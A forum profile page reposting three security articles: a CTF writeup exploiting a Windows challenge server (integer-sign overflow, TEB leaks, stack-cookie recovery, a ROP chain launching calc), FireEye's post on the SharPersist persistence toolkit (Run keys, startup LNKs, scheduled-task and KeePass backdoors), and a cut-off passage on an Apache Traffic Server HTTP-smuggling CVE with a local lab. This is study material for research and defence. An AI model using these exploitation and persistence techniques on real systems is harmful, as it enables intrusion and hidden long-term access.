Everything posted by Nytro

  1. Writeup for the BFS Exploitation Challenge 2019

Table of Contents
  • Introduction
  • TL;DR
  • Initial Dynamic Analysis
  • Statically Identifying the Vulnerability
  • Strategy
  • Preparing the Exploit
  • Building a ROP Chain
  • See Exploit in Action
  • Contact

Introduction

Having enjoyed and succeeded in solving a previous BFS Exploitation Challenge from 2017, I decided to give the 2019 BFS Exploitation Challenge a try. It is a 64-bit Windows executable for which an exploit is expected to work on a Windows 10 Redstone machine. The challenge's goals were set to:

  • Bypass ASLR remotely
  • Achieve arbitrary code execution (pop calc or notepad)
  • Have the exploited process properly continue its execution

TL;DR

Spare me all the boring details; I want to:

  • grab a copy of the challenge
  • study the decompiled code
  • study the exploit

Initial Dynamic Analysis

Running the file named 'eko2019.exe' opens a console application that seemingly waits for and accepts incoming connections from (remote) network clients. Quickly checking out the running process' security features using Sysinternals Process Explorer shows that DEP and ASLR are enabled, but Control Flow Guard is not. Good. Further examining the running process dynamically using tools such as Sysinternals TCPView or Process Monitor, or simply running netstat, could have been an option at this point, but personally I prefer diving directly into the code using my static analysis tool of choice, IDA Pro (I recommend following along with your favourite disassembler / decompiler).

Statically Identifying the Vulnerability

After disassembling the executable file and looking at the list of identified functions, only 17 out of 188 functions in total needed to be analyzed for weaknesses - the remaining ones being known library functions, imported functions and the main() function itself.
Navigating to and running the disassembled code's main() function through the Hex-Rays decompiler and putting some additional effort into renaming functions, variables and annotating the code resulted in the following output: By looking at the code and annotations shown in the screenshot above, we can see there is a call to a function in line 19 which creates a listening socket on TCP port 54321, shortly followed by a call to accept() in line 27. The socket handle returned by accept() is then passed as an argument to a function handle_client() in line 36. Keeping in mind the goals of this challenge, this is probably where the party is going to happen, so let's have a look at it. As an attacker, what we are going to look for and concentrate on are functions within the server's executable code that process any kind of input that is controlled client-side. All with the goal in mind of identifying faulty program logic that hopefully can be taken advantage of by us. In this case, it is the two calls to the recv() function in lines 21 and 30 in the screenshot above which are responsible for receiving data from a remote network client. The first call to recv() in line 21 receives a hard-coded number of 16 bytes into a "header" structure. It consists of three distinct fields, of which the first one at offset 0 is "magic", a second at offset 8 is "size_payload" and the third is unused. By accessing the "magic" field in line 25 and comparing it to a constant value "Eko2019", the server ensures basic protocol compatibility between connected clients and the server. Any client packet that fails in complying with this magic constant as part of the "header" packet is denied further processing as a consequence. By comparing the "size_payload" field of the "header" structure to a constant value in line 27, the server limits the field's maximum allowed value to 512. This is to ensure that a subsequent call to recv() in line 30 receives a maximum number of 512 bytes in total. 
Doing so prevents the destination buffer "buf" from being written to beyond its maximum size of 512 bytes - too bad! If this sanity check weren't present, it would have allowed us to overwrite anything that follows the "buf" buffer, including the return address to main() on the stack. Overwriting the saved return address could have resulted in straightforward and reliable code execution.

Skimming through this function's remaining code (and also through all the other remaining functions) doesn't reveal any more code that'd process client-side input in any obviously dangerous way, either. So we must have overlooked something and - yes, you guessed it - it's in the processing of the "pkthdr" structure. A useful pointer to what the problem could be is provided by the hint window that appears as soon as the mouse is hovered over the comparison operator in line 27. As it turns out, it is a signed integer comparison, which means the size restriction of 512 can successfully be bypassed by providing a negative number in "size_payload" along with the header packet!

Looking further down the code at line 30, the "size_payload" variable is typecast to a 16 bit integer type, as indicated by the decompiler's LOWORD() macro. Typecasting the 32 bit "size_payload" variable to a 16 bit integer effectively cuts off its upper 16 bits before it is passed as a size argument to recv(). This enables an attacker to cause the server to accept payload data with a size of up to 65535 bytes in total. Sending the server an accordingly crafted packet bypasses the intended size restriction of 512 bytes and overwrites the "buf" variable on the stack beyond its intended limits.
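The two flaws combine as follows: a 32-bit size that is negative when compared as signed passes the "<= 512" check, while only its low 16 bits reach recv(). Here is a minimal Python sketch of crafting such a header; the exact wire format (little-endian fields, NUL-padded magic) is my assumption, based only on the field offsets described above:

```python
import struct

MAGIC = b"Eko2019\x00"     # 8-byte "magic" field at offset 0 (NUL padding assumed)
PAYLOAD_LEN = 0x240        # 576 bytes: larger than the intended 512-byte cap

# Any value that is negative as a signed 32-bit integer passes the "<= 512"
# check, while LOWORD(size_payload) still equals the bytes we really send.
size_payload = 0xFFFF0000 | PAYLOAD_LEN

def as_signed32(v: int) -> int:
    """Interpret a 32-bit value the way the server's signed comparison does."""
    return v - 0x100000000 if v & 0x80000000 else v

assert as_signed32(size_payload) <= 512      # the sanity check passes
assert size_payload & 0xFFFF == PAYLOAD_LEN  # recv() size after truncation

# Hypothetical 16-byte header: magic (8 bytes), size_payload (4), unused (4)
header = struct.pack("<8sII", MAGIC, size_payload, 0)
assert len(header) == 16
```

Any 32-bit value with the top bit set whose low word equals the desired payload length works equally well.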
If we wanted to verify the decompiler's results, or if we refrained from using a decompiler entirely because we preferred sharpening or refreshing our assembly comprehension skills instead, we could just as well have a look at the assembler code:

  • the "jle" instruction indicates a signed integer comparison
  • the "movzx eax, word ptr..." instruction moves 16 bits of data from a data source to the 32 bit register eax, zero-extending its upper 16 bits

Alright, before we can start exploiting this vulnerability and take control of the server process' instruction pointer, we need to find a way to bypass ASLR remotely. Also, by checking out the handle_client() function's prologue in the disassembly, we can see there is a stack cookie that will be checked by the function's epilogue, which eventually needs to be taken care of.

Strategy

In order to bypass ASLR, we need to cause the server to leak an address that belongs to its process space. Fortunately, there is a call to the send() function in line 45, which sends 8 bytes of data - exactly the size of a pointer in 64 bit land. That should serve our purpose just fine. These 8 bytes of data are stored in a _QWORD variable "gadget_buf" as the result of a call to the exec_gadget() function in line 44. Going further up the code to line 43, we can see self-modifying code that uses the WriteProcessMemory() API function to patch the exec_gadget() function with whatever data "gadget_buf" contains. The "gadget_buf" variable in turn is the result of a call to the copy_gadget() function in line 41, which is passed the address of a global variable "g_gadget_array" as an argument. Looking at the copy_gadget() function's decompiled code reveals that it takes an integer argument, swaps its endianness and then returns the result to the caller. In summary, whatever 8 bytes "g_gadget_array" points to at position "gadget_idx % 256" will be executed by the call to exec_gadget(), and the result is then sent back to the connected client.
Looking at the cross references to "g_gadget_array", which is only initialized during run-time, we can find a for loop that initializes its 256 elements as part of the server's main() function. Going back to the handle_client() function, we find that the "gadget_idx" variable is initialized with 62, which means that the gadget pointed to by "p_gadget_array[62]" is executed by default.

The strategy is getting control of the "gadget_idx" variable. Luckily, it is a stack variable adjacent to the "buf[512]" variable and thus can be written to by sending the server data that exceeds the "buf" variable's maximum size of 512 bytes. Having "gadget_idx" under control allows us to have the server execute a gadget other than the default one at index 62 (0x3e). In order to find a reasonable gadget in the first place, I wrote a little Python script that mimics the server's initialization of "g_gadget_array" and then disassembles all its 256 elements using the Capstone Engine Python bindings.

I spent quite some time reading the resulting list of gadgets, trying to find a suitable gadget to be used for leaking a qualified pointer from the running process, but with only partial success. Knowing I must have been missing something, I still settled on a gadget that would leak just the lower 32 bits of a 64 bit pointer, for the sake of making progress, planning to fix it later: using this gadget would modify the pointer that is passed to the call to exec_gadget(), making it point to a location other than what the "p" pointer usually points to, which could then be used to leak further data. Based on working around some limitations by hard-coding stuff, I still managed to develop quite a stable exploit, including full process continuation. But it was only after a kind soul asked me whether I hadn't thought of reading from the TEB that I got on the right track to writing an exploit that is more than just quite stable.
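For illustration, the byte-swap that the writeup attributes to copy_gadget() can be mimicked in a few lines of Python (a sketch of the described behavior, not the challenge's actual code):

```python
def swap64(value: int) -> int:
    """Byte-swap a 64-bit integer, mimicking what the writeup describes
    copy_gadget() doing before the gadget bytes are patched into
    exec_gadget() via WriteProcessMemory()."""
    return int.from_bytes(value.to_bytes(8, "little"), "big")

# A gadget stored as 0x1122334455667788 comes out fully byte-reversed:
assert swap64(0x1122334455667788) == 0x8877665544332211
# Swapping twice restores the original value:
assert swap64(swap64(0xDEADBEEFCAFEF00D)) == 0xDEADBEEFCAFEF00D
```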
Thank you!

Preparing the Exploit

The TEB holds vital information that can be used for bypassing ASLR, and it is accessed via the gs segment register on 64 bit Windows systems. Looking through the list of gadgets for any occurrence of "gs:" yields a single hit, at index 0x65 of the "g_gadget_array" pointer. Acquiring the current thread's TEB address is possible by reading from gs:[030h]. In order to have the gadget shown in the screenshot above do so, the rcx register must first be set to 0x30. The rcx register is the first argument to the exec_gadget() function, which is loaded from the "p" variable on the stack. Like the "gadget_idx" variable, "p" is adjacent to the overflowable buffer, hence overwritable as well. Great.

By sending a particularly crafted sequence of network packets, we are now given the ability to leak arbitrary data from the server thread's TEB structure. For example, by sending the following packet to the server, gadget number 0x65 will be called with rcx set to 0x30:

[0x200*'A'] + ['\x65\x00\x00\x00\x00\x00\x00\x00'] + ['\x30\x00\x00\x00\x00\x00\x00\x00']

Sending this packet will overwrite the target thread's following variables on the stack and will cause the server to send us the current thread's TEB address:

[buf] + [gadget_idx] + [p]

The following screenshot shows the Python implementation of the leak_teb() function used by the exploit. With the process' TEB address leaked to us, we are well prepared for leaking further information using the default gadget 62 (0x3e), which dereferences arbitrary 64 bits of process memory pointed to by rcx per request. In turn, leaking arbitrary memory allows us to:

  • bypass DEP and ASLR
  • identify the stack cookie's position on the stack
  • leak the stack cookie
  • locate ourselves on the stack
  • eventually run an external process

In order to bypass ASLR, the "ImageBaseAddress" of the target executable must be acquired from the Process Environment Block, which is accessible at gs:[060h].
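A packet like the one above can be built programmatically. This is a hedged sketch rather than the original exploit code: the 16-byte header layout and its little-endian encoding are my assumptions, carried over from the field offsets given in the analysis:

```python
import struct

def build_leak_packet(gadget_idx: int, p_value: int) -> bytes:
    """Overflow "buf" (0x200 bytes) so the two adjacent stack variables
    "gadget_idx" and "p" take attacker-chosen values, as in the packet
    shown above."""
    body = b"A" * 0x200                    # fills buf completely
    body += struct.pack("<Q", gadget_idx)  # overwrites gadget_idx
    body += struct.pack("<Q", p_value)     # overwrites p (ends up in rcx)
    # negative 32-bit size whose low word matches the real body length:
    size = 0xFFFF0000 | len(body)
    return struct.pack("<8sII", b"Eko2019\x00", size, 0) + body

teb_leak = build_leak_packet(0x65, 0x30)  # gadget 0x65 reads gs:[0x30] -> TEB
assert len(teb_leak) == 16 + 0x200 + 16
```

The same builder covers the later leaks too, e.g. build_leak_packet(0x3e, some_address) to dereference arbitrary memory with the default gadget.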
This will allow for relative addressing of the individual ROP gadgets and is required for building a ROP chain that bypasses Data Execution Prevention. Based on the executable's in-memory "ImageBaseAddress", the address of the WinExec() API function, as well as the stack cookie's xor key, can be leaked.

What's still missing is a way of acquiring the stack cookie from the current thread's stack frame. Although I knew that the approach was faulty, I had initially leaked the cookie by abusing the fact that there exists a reliable pointer to the formatted text that is created by any preceding call to the printf() function. By sending the server a packet that solely consisted of printable characters, with a size that would overflow the entire stack frame but stop right before the stack cookie's position, the call to printf() would leak the stack cookie from the stack into the buffer holding the formatted text, whose address had previously been acquired. While this might have been an interesting approach, it is error-prone: if the cookie contained any null-bytes right in the middle, the call to printf() would make only a partial copy of the cookie, which would have made the exploit unreliable.

Instead, I decided to leak both "StackBase" and "StackLimit" from the TIB, which is part of the TEB, and walk the entire stack, starting from StackLimit, looking for the first occurrence of the saved return address to main(). Relative to that location, the cookie that belongs to the handle_client() function's stack frame can be addressed and subsequently leaked to our client. Having a copy of the cookie and a copy of the xor key at hand allows the rsp register to be recovered, which can then be used to build the final ROP chain.

Building a ROP Chain

Now that we know how to leak all the information from the vulnerable process that is required for building a fully working exploit, we can build a ROP chain and have it cause the server to pop calc.
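The final XOR step is simple enough to show concretely: MSVC's /GS protection stores the master cookie (the "xor key") XORed with a frame value (rsp, per the writeup) in the stack frame, so recovering rsp is a one-liner. The values below are made up for illustration:

```python
def recover_rsp(leaked_frame_cookie: int, master_cookie: int) -> int:
    """The in-frame /GS cookie is the master cookie XORed with rsp,
    so XORing the two leaked values yields the frame's rsp."""
    return leaked_frame_cookie ^ master_cookie

# Round trip with made-up example values:
rsp = 0x000000D98FAFF648
master = 0x00002B992DDFA232
in_frame = rsp ^ master            # what sits in handle_client()'s frame
assert recover_rsp(in_frame, master) == rsp
```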
Using ROPgadget, a list of gadgets was created which was then used to craft the following chain:

  1. The ROP chain starts at "entry_point", which is located at offset 0x230 of the vulnerable function's "buf" variable and which previously contained the original return address to main(). It loads "ptr_to_chain" at offset 0x228 into the rsp register, which effectively lets rsp point to the next gadget at 2. Stack pivoting is a vital step in order to avoid trashing the caller's stack frame; messing up the caller's frame would jeopardize stable process continuation.
  2. This gadget loads the address of a "pop rax" gadget into r12, in preparation for a "workaround" that is required in order to compensate for the return address that is pushed onto the stack by the "call r12" instruction in 4.
  3. A pointer to "buf" is loaded into rax, which now points to the "calc\0" string.
  4. The pointer to "calc\0" is copied to rcx, which is the first argument for the subsequent API call to WinExec() in 5. The call to r12 pushes a return address onto the stack and causes the "pop rax" gadget to be executed, which pops that address off of the stack again.
  5. This gadget causes the WinExec() API function to be called.
  6. The call to WinExec() happens to overwrite some of our ROP chain on the stack, hence the stack pointer is adjusted by this gadget to skip the data that is "corrupted" by the call to WinExec().
  7. The original return address to main()+0x14a is loaded into rax.
  8. rbx is loaded with the address of "entry_point".
  9. The original return address to main()+0x14a is restored by patching "entry_point" on the stack -> "mov qword ptr [entry_point], main+0x14a". After that, rsp is adjusted, followed by a few dummy bytes.
  10. rsp is adjusted so it will slowly slide into its old position at offset 0x230 of "buf", in order to return to main() and guarantee process continuation.
  11. See 10.
  12. See 10.
  13. See 10.

See Exploit in Action

Contact

Twitter

Source: https://github.com/patois/BFS2019
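To make the payload layout concrete, here is a heavily simplified sketch of how such a buffer could be assembled in Python. Every address and gadget offset below is hypothetical (only the 0x228 and 0x230 offsets come from the writeup), and a real exploit must also write the correctly re-encoded stack cookie back at its proper offset inside the frame, which is omitted here:

```python
import struct

q = lambda v: struct.pack("<Q", v)  # pack one little-endian qword

# Illustrative values only -- none of these are the challenge's real ones.
image_base  = 0x7FF6DEAD0000           # leaked ImageBaseAddress
pop_rsp_ret = image_base + 0x1000      # hypothetical stack-pivot gadget
rop_chain   = b"".join(q(image_base + off)
                       for off in (0x2000, 0x3000, 0x4000))  # placeholders

payload  = b"calc\x00".ljust(0x228, b"B")  # "buf": command string + filler
payload += q(0x0000DEAD0000BEEF)           # 0x228: ptr_to_chain (leaked stack
                                           #        address in a real exploit)
payload += q(pop_rsp_ret)                  # 0x230: overwritten return address
payload += rop_chain                       # gadgets executed after the pivot

assert payload[0x230:0x238] == q(pop_rsp_ret)
assert payload.startswith(b"calc\x00")
```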
  2. SharPersist: Windows Persistence Toolkit in C#

September 03, 2019 | by Brett Hawkins

Background

PowerShell has been used by the offensive community for several years now, but recent advances in the defensive security industry are causing offensive toolkits to migrate from PowerShell to reflective C# to evade modern security products. Some of these advancements include Script Block Logging, the Antimalware Scan Interface (AMSI), and the development of signatures for malicious PowerShell activity by third-party security vendors. Several public C# toolkits such as Seatbelt, SharpUp and SharpView have been released to assist with tasks in various phases of the attack lifecycle. One phase of the attack lifecycle that has been missing a C# toolkit is persistence. This post will talk about a new Windows Persistence Toolkit created by FireEye Mandiant's Red Team called SharPersist.

Windows Persistence

During a Red Team engagement, a lot of time and effort is spent gaining initial access to an organization, so it is vital that the access is maintained in a reliable manner. Therefore, persistence is a key component in the attack lifecycle, shown in Figure 1.

Figure 1: FireEye Attack Lifecycle Diagram

Once an attacker establishes persistence on a system, the attacker will have continual access to the system after any power loss, reboots, or network interference. This allows an attacker to lie dormant on a network for extended periods of time, whether it be weeks, months, or even years. There are two key components of establishing persistence: the persistence implant and the persistence trigger, shown in Figure 2. The persistence implant is the malicious payload, such as an executable (EXE), HTML Application (HTA), dynamic link library (DLL), or some other form of code execution. The persistence trigger is what will cause the payload to execute, such as a scheduled task or Windows service.
There are several known persistence triggers that can be used on Windows, such as Windows services, scheduled tasks, the registry, and the startup folder, and more continue to be discovered. For a more thorough list, see the MITRE ATT&CK persistence page.

Figure 2: Persistence equation

SharPersist Overview

SharPersist was created in order to assist with establishing persistence on Windows operating systems using a multitude of different techniques. It is a command line tool written in C# which can be reflectively loaded with Cobalt Strike's "execute-assembly" functionality or any other framework that supports the reflective loading of .NET assemblies. SharPersist was designed to be modular to allow new persistence techniques to be added in the future. There are also several items related to tradecraft that have been built in to the tool and its supported persistence techniques, such as file time stomping and running applications minimized or hidden. SharPersist and all associated usage documentation can be found at the SharPersist FireEye GitHub page.

SharPersist Persistence Techniques

There are several persistence techniques that are supported in SharPersist at the time of this blog post. A full list of these techniques, with their switch name (-t), whether admin privileges are required, whether they touch the registry, and whether they add/modify files on disk, is shown in Figure 3.

  • KeePass (keepass) - Backdoors the KeePass configuration file. Admin required: No. Touches registry: No. Adds/modifies files on disk: Yes.
  • New Scheduled Task (schtask) - Creates a new scheduled task. Admin required: No. Touches registry: No. Adds/modifies files on disk: Yes.
  • New Windows Service (service) - Creates a new Windows service. Admin required: Yes. Touches registry: Yes. Adds/modifies files on disk: No.
  • Registry (reg) - Registry key/value creation/modification. Admin required: No. Touches registry: Yes. Adds/modifies files on disk: No.
  • Scheduled Task Backdoor (schtaskbackdoor) - Backdoors an existing scheduled task with an additional action. Admin required: Yes. Touches registry: No. Adds/modifies files on disk: Yes.
  • Startup Folder (startupfolder) - Creates an LNK file in the user startup folder. Admin required: No. Touches registry: No. Adds/modifies files on disk: Yes.
  • Tortoise SVN (tortoisesvn) - Creates a Tortoise SVN hook script. Admin required: No. Touches registry: Yes. Adds/modifies files on disk: No.

Figure 3: Table of supported persistence techniques

SharPersist Examples

On the SharPersist GitHub, there is full documentation on usage and examples for each persistence technique. A few of the techniques will be highlighted below.

Registry Persistence

The first technique that will be highlighted is the registry persistence. A full listing of the supported registry keys in SharPersist is shown in Figure 4; each entry gives the key code (-k), the registry key, the registry value, whether admin privileges are required, and whether the env optional add-on (-o env) is supported.

  • hklmrun - HKLM\Software\Microsoft\Windows\CurrentVersion\Run (value: user supplied). Admin required: Yes. Supports -o env: Yes.
  • hklmrunonce - HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce (value: user supplied). Admin required: Yes. Supports -o env: Yes.
  • hklmrunonceex - HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx (value: user supplied). Admin required: Yes. Supports -o env: Yes.
  • userinit - HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (value: Userinit). Admin required: Yes. Supports -o env: No.
  • hkcurun - HKCU\Software\Microsoft\Windows\CurrentVersion\Run (value: user supplied). Admin required: No. Supports -o env: Yes.
  • hkcurunonce - HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce (value: user supplied). Admin required: No. Supports -o env: Yes.
  • logonscript - HKCU\Environment (value: UserInitMprLogonScript). Admin required: No. Supports -o env: No.
  • stickynotes - HKCU\Software\Microsoft\Windows\CurrentVersion\Run (value: RESTART_STICKY_NOTES). Admin required: No. Supports -o env: No.

Figure 4: Supported registry keys table

In the following example, we will be performing a validation of our arguments and then will add registry persistence.
Performing a validation before adding the persistence is a best practice, as it makes sure that you have the correct arguments and pass other safety checks before actually adding the respective persistence technique. The example shown in Figure 5 creates a registry value named "Test" with the value "cmd.exe /c calc.exe" in the "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" registry key.

Figure 5: Adding registry persistence

Once the persistence needs to be removed, it can be removed using the "-m remove" argument, as shown in Figure 6. We are removing the "Test" registry value that was created previously, and then we are listing all registry values in "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" to validate that it was removed.

Figure 6: Removing registry persistence

Startup Folder Persistence

The second persistence technique that will be highlighted is the startup folder persistence technique. In this example, we are creating an LNK file called "Test.lnk" that will be placed in the current user's startup folder and will execute "cmd.exe /c calc.exe", as shown in Figure 7.

Figure 7: Performing dry-run and adding startup folder persistence

The startup folder persistence can then be removed, again using the "-m remove" argument, as shown in Figure 8. This will remove the LNK file from the current user's startup folder.

Figure 8: Removing startup folder persistence

Scheduled Task Backdoor Persistence

The last technique highlighted here is the scheduled task backdoor persistence. Scheduled tasks can be configured to execute multiple actions at a time, and this technique will backdoor an existing scheduled task by adding an additional action. The first thing we need to do is look for a scheduled task to backdoor. In this case, we will be looking for scheduled tasks that run at logon, as shown in Figure 9.
Figure 9: Listing scheduled tasks that run at logon

Once we have a scheduled task that we want to backdoor, we can perform a dry run to ensure the command will work, and then actually execute the command, as shown in Figure 10.

Figure 10: Performing dry run and adding scheduled task backdoor persistence

As you can see in Figure 11, the scheduled task is now backdoored with our malicious action.

Figure 11: Listing backdoored scheduled task

A backdoored scheduled task action used for persistence can be removed as shown in Figure 12.

Figure 12: Removing backdoored scheduled task action

Conclusion

Using reflective C# to assist in various phases of the attack lifecycle is a necessity in the offensive community, and persistence is no exception. Windows provides multiple techniques for persistence, and more will continue to be discovered and used by security professionals and adversaries alike. This tool is intended to aid security professionals in the persistence phase of the attack lifecycle. By releasing SharPersist, we at FireEye Mandiant hope to bring awareness to the various persistence techniques that are available in Windows and the ability to use these persistence techniques with C# rather than PowerShell.

Source: https://www.fireeye.com/blog/threat-research/2019/09/sharpersist-windows-persistence-toolkit.html
  3. Security: HTTP Smuggling, Apache Traffic Server

Sept 17, 2019 - security details of CVE-2018-8004 (August 2018 - Apache Traffic Server).

Table of contents:
  • What is this about?
  • Apache Traffic Server?
  • Fixed versions of ATS
  • CVE-2018-8004
  • Step by step Proof of Concept
    • Set-up the lab: Docker instances
    • Test That Everything Works
    • Request Splitting by Double Content-Length
    • Request Splitting by NULL Character Injection
    • Request Splitting using Huge Header, Early End-Of-Query
    • Cache Poisoning using Incomplete Queries and Bad Separator Prefix
      • Attack schema
    • HTTP Response Splitting: Content-Length Ignored on Cache Hit
      • Attack schema
  • Timeline
  • See also

English version (a French version is available on makina corpus). Estimated read time: 15 min, or really much more.

What is this about?

This article will give a deep explanation of the HTTP Smuggling issues present in CVE-2018-8004. Firstly because there's currently not much information about it ("Undergoing Analysis" at the time of this writing on the previous link). Secondly because some time has passed since the official announcement (and even more since the availability of fixes in v7), but mostly because I keep receiving questions about what exactly HTTP Smuggling is and how to test/exploit this type of issue - and because Smuggling issues are now trending and easier to test thanks to the great work of James Kettle (@albinowax).

So, this time, I'll give you not only details but also a step by step demo, with some Dockerfiles to build your own test lab. You can use that test lab to experiment with manual raw queries, or to test the recently added Burp Suite Smuggling tools. I'm really a big proponent of always searching for Smuggling issues in non-production environments, for legal reasons and also to avoid unintended consequences (and we'll see in this article, with the last issue, that unintended behaviors can always happen).

Apache Traffic Server?

Apache Traffic Server, or ATS, is an open source HTTP load balancer and reverse proxy cache.
It is based on a commercial product donated to the Apache Foundation. It's not related to the Apache httpd HTTP server; the "Apache" name comes from the Apache Foundation, and the code is very different from httpd's. If you were to search for ATS installations in the wild you would find some, hopefully fixed by now.

Fixed versions of ATS

As stated in the CVE announcement (2018-08-28), the impacted ATS versions are 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. Version 7.1.4 was released on 2018-08-02 and 6.2.3 on 2018-08-04. That's the official announcement, but I think 7.1.3 contained most of the fixes already, and is maybe not vulnerable. The announcement was mostly delayed for the 6.x backports (and some other fixes were released at the same time, for other issues). If you wonder about previous versions, like 5.x, they're out of support, and quite certainly vulnerable. Do not use out-of-support versions.

CVE-2018-8004

The official CVE description is:

    There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with ATS.

Which does not give a lot of pointers, but there's much more information in the 4 pull requests listed:

  • #3192: Return 400 if there is whitespace after the field name and before the colon
  • #3201: Close the connection when returning a 400 error response
  • #3231: Validate Content-Length headers for incoming requests
  • #3251: Drain the request body if there is a cache hit

If you have already studied some of my previous posts, some of these sentences might already seem dubious. For example, not closing a response stream after a 400 error is clearly a fault based on the standards, but it is also a good catch for an attacker. Chances are that by crafting a bad message chain you may succeed in receiving a response for some queries hidden in the body of an invalid request. The last one, "Drain the request body if there is a cache hit", is the nicest one, as we will see in this article, and it was hard to detect.
My original report listed 5 issues:

  • HTTP request splitting using a NULL character in a header value
  • HTTP request splitting using a huge header size
  • HTTP request splitting using double Content-Length headers
  • HTTP cache poisoning using an extra space before the separator of header name and header value
  • HTTP request splitting using ... (no spoiler: I keep that for the end)

Step by step Proof of Concept

To understand the issues, and see the effects, we will be using a demonstration/research environment. If you ever want to test HTTP Smuggling issues you should really, really, try to test them in a controlled environment. Testing issues on live environments would be difficult because:

  • You may have some very good HTTP agents (load balancers, SSL terminators, security filters) between you and your target, hiding most of your successes and errors.
  • You may trigger errors and behaviors that you have no idea about. For example, I encountered random, unreproducible errors on several fuzzing tests (on test envs) before understanding that they were related to the last smuggling issue we will study in this article. Effects were delayed on subsequent tests, and I was not in control, at all.
  • You may trigger errors on requests sent by other users, and/or for other domains. That's not like testing a self-reflected XSS; you could end up in court for that.
  • Real-life complete examples usually occur with interactions between several different HTTP agents, like Nginx + Varnish, or ATS + HaProxy, or Pound + IIS + Nodejs, etc. You will have to understand how each actor interacts with the others, and you will see it faster with a local low level network capture than blindly across an unknown chain of agents (for example to learn how to detect each agent on this chain).

So it's very important to be able to rebuild a laboratory environment.
And, if you find something, this environment can then be used to send detailed bug reports to the program owners (in my own experience, it can sometimes be quite difficult to explain the issues; a working demo helps).

Set-up the lab: Docker instances

We will run two Apache Traffic Server instances, one in version 6.x and one in version 7.x. To add some variety, and potential smuggling issues, we will also add an Nginx docker and an HaProxy one. Four HTTP actors, each one on a local port:

  • 127.0.0.1:8001 : HaProxy (internally listening on port 80)
  • 127.0.0.1:8002 : Nginx (internally listening on port 80)
  • 127.0.0.1:8007 : ATS7 (internally listening on port 8080)
  • 127.0.0.1:8006 : ATS6 (internally listening on port 8080); most examples will use ATS7, but you will be able to test this older version simply by using this port instead of the other (and altering the domain)

We will chain some reverse proxy relations: Nginx will be the final backend, HaProxy the front load balancer, and between Nginx and HaProxy we will go through ATS6 or ATS7 based on the domain name used (dummy-host7.example.com for ATS7 and dummy-host6.example.com for ATS6).

Note that the localhost port mappings of the ATS and Nginx instances are not strictly needed; if you can inject a request into HaProxy it will reach Nginx internally, via port 8080 of one of the ATS instances and port 80 of Nginx. But they can be useful if you want to target one of the servers directly, and we will have to avoid the HaProxy part in most examples, because most attacks would be blocked by this load balancer. So most examples will directly target the ATS7 server first, on 8007. Later you can try to succeed in targeting 8001; that will be harder.
                 +---[80]---+
                 | 8001->80 |
                 | HaProxy  |
                 |          |
                 +--+---+---+
    [dummy-host6.example.com] [dummy-host7.example.com]
            +-------+   +------+
            |                  |
     +-[8080]-----+    +-[8080]-----+
     | 8006->8080 |    | 8007->8080 |
     |    ATS6    |    |    ATS7    |
     |            |    |            |
     +-----+------+    +----+-------+
           |                |
           +-------+--------+
                   |
              +--[80]----+
              | 8002->80 |
              |  Nginx   |
              |          |
              +----------+

To build this cluster we will use docker-compose. You can find the docker-compose.yml file here, but the content is quite short:

    version: '3'

    services:
      haproxy:
        image: haproxy:1.6
        build:
          context: .
          dockerfile: Dockerfile-haproxy
        expose:
          - 80
        ports:
          - "8001:80"
        links:
          - ats7:linkedats7.net
          - ats6:linkedats6.net
        depends_on:
          - ats7
          - ats6
      ats7:
        image: centos:7
        build:
          context: .
          dockerfile: Dockerfile-ats7
        expose:
          - 8080
        ports:
          - "8007:8080"
        depends_on:
          - nginx
        links:
          - nginx:linkednginx.net
      ats6:
        image: centos:7
        build:
          context: .
          dockerfile: Dockerfile-ats6
        expose:
          - 8080
        ports:
          - "8006:8080"
        depends_on:
          - nginx
        links:
          - nginx:linkednginx.net
      nginx:
        image: nginx:latest
        build:
          context: .
          dockerfile: Dockerfile-nginx
        expose:
          - 80
        ports:
          - "8002:80"

To make this work you will also need the 4 specific Dockerfiles:

  • Dockerfile-haproxy: an HaProxy Dockerfile, with the right conf
  • Dockerfile-nginx: a very simple Nginx Dockerfile with one index.html page
  • Dockerfile-ats7: an ATS 7.1.1 compiled-from-archive Dockerfile
  • Dockerfile-ats6: an ATS 6.2.2 compiled-from-archive Dockerfile

Put all these files (the docker-compose.yml and the Dockerfile-* files) into a working directory and run in this dir:

    docker-compose build && docker-compose up

You can now take a big break; you are launching two compilations of ATS. Hopefully the next time a simple up will be enough, and even the build may not redo the compilation steps. You can easily add another ats7-fixed element to the cluster, to test the fixed version of ATS if you want. For now we will concentrate on detecting issues in flawed versions.
Test That Everything Works

We will run basic, non-attacking queries on this installation, to check that everything is working, and to train ourselves on the printf + netcat way of running queries. We will not use curl or wget to run the HTTP queries, because it would be impossible to write bad queries with them. So we need to use low-level string manipulation (with printf for example) and socket handling (with netcat -- or nc --).

Test Nginx (that's a one-liner split for readability):

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8002

You should get the index.html response, something like:

HTTP/1.1 200 OK
Server: nginx/1.15.5
Date: Fri, 26 Oct 2018 15:28:20 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
Connection: keep-alive
ETag: "5bd321bc-78"
X-Location-echo: /
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

Then test ATS7 and ATS6:

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8007

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8006

Then test HaProxy; altering the Host name should make the request transit via ATS7 or ATS6 (check the Server: header in the response):

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8001

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8001

And now let's start with more complex HTTP stuff: we will make an HTTP pipeline, sending several queries and receiving several responses, as pipelining is the root of most smuggling attacks:

# send one pipelined chain of queries
printf 'GET /?cache=1 HTTP/1.1\r\n'\
